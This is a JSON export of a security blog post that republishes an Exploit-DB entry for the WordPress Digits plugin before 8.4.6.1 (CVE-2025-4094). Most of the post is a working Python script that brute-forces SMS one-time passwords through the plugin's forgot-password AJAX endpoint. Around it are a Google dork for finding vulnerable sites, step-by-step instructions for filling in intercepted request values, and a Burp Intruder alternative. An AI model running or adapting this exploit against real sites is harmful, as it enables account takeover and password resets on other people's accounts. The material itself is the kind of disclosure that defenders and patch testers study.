{"id":6084,"date":"2025-05-29T05:34:37","date_gmt":"2025-05-29T05:34:37","guid":{"rendered":"http:\/\/localhost\/?p=6084"},"modified":"2025-05-29T05:34:37","modified_gmt":"2025-05-29T05:34:37","slug":"wordpress-digits-plugin-8461-authentication-bypass-via-otp-bruteforcing","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=6084","title":{"rendered":"WordPress Digits Plugin 8.4.6.1 &#8211; Authentication Bypass via OTP Bruteforcing"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">WordPress Digits Plugin 8.4.6.1 &#8211; Authentication Bypass via OTP Bruteforcing<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52307<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-29T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-29T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">9.8<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #cc0000; font-weight: bold;\">CRITICAL<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2025-4094<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\nExploit Title: WordPress Digits Plugin 8.4.6.1 &#8211; Authentication Bypass via OTP&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n# Exploit Title: WordPress Digits Plugin 8.4.6.1 &#8211; Authentication Bypass via OTP Bruteforcing<br \/>\n<br \/># Google Dork: inurl:\/wp-content\/plugins\/digits\/<br \/>\n<br \/># Date: 2025-04-30<br \/>\n<br \/># Exploit Author: Saleh Tarawneh<br \/>\n<br \/># Vendor Homepage: https:\/\/digits.unitedover.com\/<br \/>\n<br \/># Version: < 8.4.6.1\n<br \/># CVE : CVE-2025-4094<\/p>\n<p>&#8220;&#8221;&#8221;<br \/>\n<br \/>The Digits plugin for WordPress prior to version 8.4.6.1 is vulnerable to OTP brute-force attacks due to missing rate limiting.<br \/>\n<br \/>An attacker can exploit this to bypass authentication or password reset by iterating over possible OTP values.<\/p>\n<p>This PoC targets the &#8220;Forgot Password&#8221; flow and automates the attack, which is the same concept that is valid for the registration flow.<\/p>\n<p>CWE-287: Improper Authentication<br \/>\n<br \/>CVSS v3.1: 9.8 (Critical)<br \/>\n<br \/>OWASP A2: Broken Authentication<\/p>\n<p>[Instructions]<br \/>\n<br \/>1. Use a tool like Burp Suite or your browser\u2019s developer tools to intercept the OTP verification request.<br \/>\n<br \/>2. Copy the exact request parameters<br \/>\n<br \/>3. Replace the placeholder values in the script with real data from the intercepted request.<br \/>\n<br \/>4. Run the script to brute-force 4-digit OTPs (0000 to 9999) or you can change it to 6-digit.<\/p>\n<p>[Alternative Method \u2013 Burp Suite Pro]<\/p>\n<p>If you have Burp Suite Pro, you can perform the OTP brute-force attack manually:<\/p>\n<p>1. Intercept the OTP request using Burp Proxy.<br \/>\n<br \/>2. Send the request to Intruder.<br \/>\n<br \/>3. Mark the `sms_otp` parameter as the payload position.<br \/>\n<br \/>4. Load a payload list from `000000` to `999999` (for 6-digit OTPs).<br \/>\n<br \/>5. Start the attack and monitor responses for a different status code, length, or success message.<\/p>\n<p>&#8220;&#8221;&#8221;<\/p>\n<p>import requests<\/p>\n<p>def brute(otp):<br \/>\n<br \/>    url = &#8220;https:\/\/example.com\/wp-admin\/admin-ajax.php&#8221;<br \/>\n<br \/>    data = {                                             # Replace with targets data<br \/>\n<br \/>        &#8220;login_digt_countrycode&#8221;: &#8220;+&#8221;,<br \/>\n<br \/>        &#8220;digits_phone&#8221;: &#8220;000000000&#8221;,<br \/>\n<br \/>        &#8220;action_type&#8221;: &#8220;phone&#8221;,<br \/>\n<br \/>        &#8220;sms_otp&#8221;: otp,<br \/>\n<br \/>        &#8220;otp_step_1&#8221;: &#8220;1&#8221;,<br \/>\n<br \/>        &#8220;instance_id&#8221;: &#8220;xxxxxxx&#8221;,<br \/>\n<br \/>        &#8220;action&#8221;: &#8220;digits_forms_ajax&#8221;,<br \/>\n<br \/>        &#8220;type&#8221;: &#8220;forgot&#8221;,<br \/>\n<br \/>        &#8220;forgot_pass_method&#8221;: &#8220;sms_otp&#8221;,<br \/>\n<br \/>        &#8220;digits&#8221;: &#8220;1&#8221;,<br \/>\n<br \/>        &#8220;digits_redirect_page&#8221;: &#8220;\/\/example.com\/&#8221;,<br \/>\n<br \/>        &#8220;digits_form&#8221;: &#8220;xxxxxxxx&#8221;,<br \/>\n<br \/>        &#8220;_wp_http_referer&#8221;: &#8220;\/?login=true&#8221;<br \/>\n<br \/>    }<br \/>\n<br \/>    headers = {<br \/>\n<br \/>        &#8220;User-Agent&#8221;: &#8220;Mozilla\/5.0&#8221;,<br \/>\n<br \/>        &#8220;Content-Type&#8221;: &#8220;application\/x-www-form-urlencoded; charset=UTF-8&#8221;,<br \/>\n<br \/>        &#8220;X-Requested-With&#8221;: &#8220;XMLHttpRequest&#8221;,<br \/>\n<br \/>        &#8220;Referer&#8221;: &#8220;https:\/\/example.com\/?login=true&#8221;  # Replace with intercepted referer<br \/>\n<br \/>    }<br \/>\n<br \/>    response = requests.post(url, data=data, headers=headers)<br \/>\n<br \/>    if &#8216;&#8221;success&#8221;:true&#8217; in response.text:<br \/>\n<br \/>        print(f&#8221;[+] OTP FOUND: {otp}&#8221;)<br \/>\n<br \/>        exit()<\/p>\n<p>def main():<br \/>\n<br \/>    for otp in range(0, 10000): # range(0, 1000000): for 6-digit<br \/>\n<br \/>        otp_str = f&#8221;{otp:04d}&#8221;     # {otp:06d} for 6-digit<br \/>\n<br \/>        print(f&#8221;[*] Trying OTP: {otp_str}&#8221;)<br \/>\n<br \/>        brute(otp_str)<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>\n<br \/>    main()\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52307\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title WordPress Digits Plugin 8.4.6.1 &#8211; Authentication Bypass via OTP Bruteforcing Exploit ID EDB-ID:52307 Type exploitdb Published 2025-05-29T00:00:00 Modified 2025-05-29T00:00:00&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,40,13,7,11,5],"class_list":["post-6084","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=6084\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title WordPress Digits Plugin 8.4.6.1 &#8211; Authentication Bypass via OTP Bruteforcing Exploit ID EDB-ID:52307 Type exploitdb Published 2025-05-29T00:00:00 Modified 2025-05-29T00:00:00...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=6084\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-29T05:34:37+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6084#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6084\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"WordPress Digits Plugin 8.4.6.1 &#8211; Authentication Bypass via OTP Bruteforcing\",\"datePublished\":\"2025-05-29T05:34:37+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6084\"},\"wordCount\":432,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"exploitdb\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=6084#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6084\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6084\",\"name\":\"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-05-29T05:34:37+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6084#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=6084\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6084#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"WordPress Digits Plugin 8.4.6.1 &#8211; Authentication Bypass via OTP Bruteforcing\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=6084","og_locale":"en_US","og_type":"article","og_title":"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing - zero redgem","og_description":"Exploit Details Basic Information Exploit Title WordPress Digits Plugin 8.4.6.1 &#8211; Authentication Bypass via OTP Bruteforcing Exploit ID EDB-ID:52307 Type exploitdb Published 2025-05-29T00:00:00 Modified 2025-05-29T00:00:00...","og_url":"https:\/\/zero.redgem.net\/?p=6084","og_site_name":"zero redgem","article_published_time":"2025-05-29T05:34:37+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=6084#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=6084"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"WordPress Digits Plugin 8.4.6.1 &#8211; Authentication Bypass via OTP Bruteforcing","datePublished":"2025-05-29T05:34:37+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=6084"},"wordCount":432,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","exploitdb","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=6084#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=6084","url":"https:\/\/zero.redgem.net\/?p=6084","name":"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-05-29T05:34:37+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=6084#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=6084"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=6084#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"WordPress Digits Plugin 8.4.6.1 &#8211; Authentication Bypass via OTP Bruteforcing"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/6084","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6084"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/6084\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6084"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6084"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6084"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}